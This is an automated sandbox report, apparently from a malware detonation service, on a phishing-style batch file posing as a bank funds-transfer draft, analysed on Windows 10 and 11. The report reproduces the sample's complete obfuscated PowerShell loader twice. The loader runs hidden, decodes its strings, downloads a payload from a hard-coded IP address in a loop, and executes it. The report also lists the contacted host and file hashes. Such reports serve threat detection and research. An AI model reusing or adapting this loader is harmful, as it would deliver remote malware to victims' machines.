Analysis Overview
SHA256
7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
Threat Level: Likely malicious
The file CBQ Funds transfer DraftUdkikspostens44.bat was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-10 16:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 16:13
Reported
2024-06-10 16:16
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4376 wrote to memory of 2476 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4376 wrote to memory of 2476 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2476 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2476 wrote to memory of 1816 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. ';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne '.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
Network
| Country | Destination | Domain | Proto |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp |
Files
memory/2476-2-0x00007FF84D7C3000-0x00007FF84D7C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hifaarw.s4b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2476-3-0x000001C479950000-0x000001C479972000-memory.dmp
memory/2476-13-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-14-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-15-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-16-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
memory/2476-17-0x00007FF84D7C0000-0x00007FF84E281000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-10 16:13
Reported
2024-06-10 16:16
Platform
win11-20240419-en
Max time kernel
147s
Max time network
143s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4732 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4732 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2556 wrote to memory of 1744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2556 wrote to memory of 1744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Gaseosity = 1;Function Boligforeningerne($Topsyturn196){$Lappe=$Topsyturn196.Length-$Gaseosity;$Xylofoner='Substring';For( $Sneezeless=5;$Sneezeless -lt $Lappe;$Sneezeless+=6){$Sjoflende+=$Topsyturn196.$Xylofoner.Invoke( $Sneezeless, $Gaseosity);}$Sjoflende;}function Trkosten($Phenotypically){ . ($Frikirkeligt) ($Phenotypically);}$Mllerier=Boligforeningerne 'AnoliMStin,oUnspezWreckiBe aulHoldilDemoraStemn/Malin5 cabr. Elec0Skarv Muyan(ModdeWbytt i SynanSoldad StraoTostsw P.wisEphem PrehoNmerciTMorig Kjert1Oen,t0 Ingr. T be0Hoved; lukf Re,igW.serbiBiflon S,ru6forel4Vur.e; Desp T lrexB.igi6Ska,l4,utom;.ivva Jugulr Slu,vRodfo:Tran,1Koumy2medb 1Bibeh.Skral0 Dott) Am,h OverhGHeksaeRigsecPigbok,lapsoForre/Try.n2Extra0Reti 1Srgmo0 Afho0Hemme1Pos,l0Frihe1 S.op PlyshFDivisiYorejr appeeDybsifKr,nvoUd tyxResor/ ,ivi1Vejre2Amanu1gips .Noncr0Refle ';$Batching=Boligforeningerne 'AdiapUA.aphsKabaleXerxer Resu- SpirA rueg FarieHydron OrthtPist ';$Phalerate=Boligforeningerne 'TimebhLysstt Inolt c,ucpBeskf: P eu/Arm e/M,let1Podop9Scott4Block.m,ste5Bonde9 Tred.No.ap3 Nonl1Rosen.Uljam1 Cull8disb 7anvil/Wa,neSLefl.tOpmunv Zeron Bel.eNeurovOxy,ea AmirrJataksIn,pelfra seAgregrAzotinKil,eegrovvsApana.K,bbaaNonbrsDukkedS,ttl ';$Slkkendes=Boligforeningerne ' Blve> R ts ';$Frikirkeligt=Boligforeningerne 'AnkomiEjerfeHypo xProgr ';$Tranebrret='Genoplivningernes';$Rentetabet = Boligforeningerne 'BarcoeViscic karnhAnticoWaspy Lsni% Doc aMobbipPre.ep Dyr.dMaltlaOverdtB.mbaa .itt%Linke\ WebsPGe.brrZeoidopredrgSk.ivr.elenaKe ikmSanctdKundeiKo kkskonfikAtropeBelnnsfakir. S kupA,trouKartobL,yal Ud ug&Treva&Assig G,aseUn,vic Lan.hTas mo Supe OmbyttGyni. ';Trkosten (Boligforeningerne 'Termo$ Ph.sgKursulKirkeoStrmkbDulcaa UnbrlDimen:ostraBMalvao UarbmUticksprecotV,rver Af.ekPresut,ncha=Opbyg( synkcRedemmf.lmsdTempo Peini/U,dancKugle Wales$ VddeR MusteBru.hnReputtInconeM tritKittiaKludebReakteBinyrtBrand) cill ');Trkosten (Boligforeningerne 'Lford$Dr megSamm l OnycoInfusbE.akuaUncurlEstop:InoppARu,agrGle,evChec,tSnuffaO drag CommeCombir OplasNikke3Museu2Downb=benzi$ DiamP TraphFilmga sopelTeglveIchthrLidesaEquiptHo,edeSides.RasursBarbapCalorl,euniiBi cht,cari(Archd$Frys SOv rdl AntekIntelkTi eseAilurnUncl dTyskee N,olsFornu) orn ');$Phalerate=$Arvtagers32[0];$Skorpende= (Boligforeningerne 'Somno$snerlgBedrvl Pi.poFoulebNasioaS.olelBloe :Re,exAF.rlif praitPrinca BarngTurisn SupeiAgroin fferg Skil=SceneN DelaeKalkkwEnla,-FrausOE,ittbBo,stjMad,geDeltictelsltFlgev Rudd,S HjeryRegntsBurretEksise StabmA ria.RetinN RekleSkrlltSkole.Eft rWVarigeStudibJavakCDogmalSiderimalieeSnootnOmgngt');$Skorpende+=$Bomstrkt[1];Trkosten ($Skorpende);Trkosten (Boligforeningerne ' Slvi$ChuumA LillfBr getR.mfraMinstgHolmbn,laceiIndivnSkovfgVideo.SkarnHTipoleSupp,a angdAn ipeVideorSamfusA.elo[Mel e$Pla oBAeronaReafftRutincUnbithUnpeniItinenWrungg ate]Pi.hf=De.el$ SmooMLvindlK,mmulYdelsenonrerBladmiMusike,nsecrM dst ');$Shockwave=Boligforeningerne 'Fdeva$ t,peALa sef PrgntSkrydaGenopgsquamnBevi,ich vanLektugfette.pu luD dotaoCootewUhm,enForaalLivsboPomada ,guddVarenFSammei PlanlStatie Hear(telef$G nudPEjidohv negaFannelweepaeHandir Sonda YvertKildee Last, Orth$ Qu.tN bonuy E ertSkibotEir.ee,ucaivPostsiMeinerRef.skViskenUnshaiStresnHashpg,nboneContrnHink.)Hoved ';$Nyttevirkningen=$Bomstrkt[0];Trkosten (Boligforeningerne 'Flumd$,orgeg ropolTppefoSekunbbe.ola.iscil Prin:Kaab,SOver.oHam tlLobataFyrstnC rteiGo.henCassasUnent=Pl nk(Tu,keT Milje FeltsUpaaktBjler-Tect.PChaisaNyr mt Haanh Unau Inart$GlobaN.chooyknurstEusuctRechaekonfev anfricheesrFonogkBooknnSy,paiCo.ntnP,ssigFllese PrecnQuart)Sikke ');while (!$Solanins) {Trkosten (Boligforeningerne '.anse$N.nsugTidsalMea,woHovedbPyopnaOrgeal Kvin:Countlaarsbs issubLiljelTipstaSiderdTappesconvobKa alg verteGeninrC,rdls Jord=Ti,ss$ asttHunderCountu KrideHylde ') ;Trkosten $Shockwave;Trkosten (Boligforeningerne ' FlamSbalkrtMed.ca litor UncotFl.es- PalaSAnie.llula.eTerm e.dkerpvan.s Altin4Andel ');Trkosten (Boligforeningerne 'Kobr.$VgtstgForbulV.rseoKlenobRelataEnerglDybfr:FlehoSEnforoSympal palea CounnCvs,oiLacewn fires Lion=Thasi(TatspTIn,oreBegyns OutrtSolit-TeetsPhyp caSici tSwizzhgrdho Jerik$MisjoN.irknyDermot LakitStrubebebruv ebuiUdsvvrBoo,mkRei cnApogaiArmennIndlsgDuckyeCarvenBas,a) Unde ') ;Trkosten (Boligforeningerne 'Ph,go$ Zeu,gAfriclSmaafo Stylb Fd paokkerl kv.r:.edthBTerm eFrysedBondoeUnfitnPn,umsTus,e=Arbit$P,stcgVa.ddl ndstofemtob.iphyaPhysilTrev.: UnseSF rege .angmSh,moi HerbcKampdaRearor ruitbPhysoaSpankz,eforoDrej.nOr iseMarkf+ Rejs+Forsv%anden$PrecoACaterr.unstvSviret P,ssaUnp ngFaikeekrig,rJ,viassim n3Appra2,astr..eepscKlinkoMiljbuD,elln Vi tt ,ubi ') ;$Phalerate=$Arvtagers32[$Bedens];}$Coincides=318126;$Flyvesikkerhed=29110;Trkosten (Boligforeningerne 'Hun,e$Supe,g N,bbl areowitlebPrestaUnderlBem,s:SvindDAvisuuRe oll Mic lLydensKatalvHjkulitastylOver.lMuslieLiv l Nonmi=Abstr BrachG.atlieDi mat ,ubp-HeterCStapeo PosinImmertCassoeSmandnEelymt Vgtf raast$VedlgNSkoley .nobtalt,vtConcoeLese,vLikviiUneffrRelatkCa,ernG afiiUninvn Gri.gUdkrye Ordkn P ea ');Trkosten (Boligforeningerne 'L ngv$TendegPengel boaroEje ib multaSetonlNykal:RecapSrandbm,utikrPlagisA.klnkVersee Bi.feP,ussrCivilnFyld eThimbsDetek D ohi=Looi Untra[ Gea,S ryptySkalpsForbrtRediseWashim V,ne. RomaCNoncooElektnMemsavPr,sceStemprRevertlntri]te.re:Raaki:Opl.dFExtrarBrevboKom,lm ProcBStolza pplasDub,eeUnscr6vough4UngarSPjevstDa oprind,aiLevnen Onl gSaml,( Semi$supprDS intu Halsl M ril homes .oplvSau hiMin rl Bl allov,seTarso) Apo ');Trkosten (Boligforeningerne ',equi$ Skumg .ksplConseo,yderb FlyvaAeroclTimet:Krimis MulttP.deraD.ojarGrusetdemo,sAci bvDeed,iWeepin W ltgPresssEmoti Revan=Frste Skriv[ ,lanSSkildyFinansEnrapt Brane ooram Duol.TanksTWa,dpeQuickxIncontPoeti.My.erEKabelncollecFor,mo Na,idClassiSkvatn.ensogMar f]Stora:Ante,:P.ratA FyrrSYomudCAntisITinseIForeg.SnowbGhlofteNonattHep aSSlenttSkattr Lre.iE,cranJeglagAfteg( Kyan$ UnclSfstnimSegurr Synbs.ngynkTamoreC,phaeUm.rarProgrn Genee,alilsWhirr)Pe iz ');Trkosten (Boligforeningerne 'Strib$O.reggTremolT.ysto ,ultb SkruaSupr lTetra:InfraS Fl ekUniseaKoglethystetUncone Hel r Gar,eMassatAlmi.s R gslGloriiadvokgstart=Nonch$Subc sNglettWien.aInte,rUngeatVestisSmagfvPrismiIndekn Hje.gStjfisS jer. Medis,roduuBongobMascusDampbtObs.qr Hje,iYderznHandeg Genn(Autog$UprakCUnchaoRutaeiInternSkylnc ChociUnpundPatene aggasUnfoa,Flyv.$CatecFUr.tel SolfyPrisevAdmineFlagssM,nkeiFlammkSelvbkGeekyeScriprVanpoh T rneEm,cidretsv)T oro ');Trkosten $Skatteretslig;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"
Network
| Country | Destination | Domain | Proto |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp | |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp | |
| BG | 194.59.31.187:80 | tcp |
Files
memory/2556-2-0x00007FF830B93000-0x00007FF830B95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rywbpngc.yc2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2556-11-0x00000140F8020000-0x00000140F8042000-memory.dmp
memory/2556-12-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-13-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-14-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-15-0x00007FF830B90000-0x00007FF831652000-memory.dmp
memory/2556-16-0x00007FF830B90000-0x00007FF831652000-memory.dmp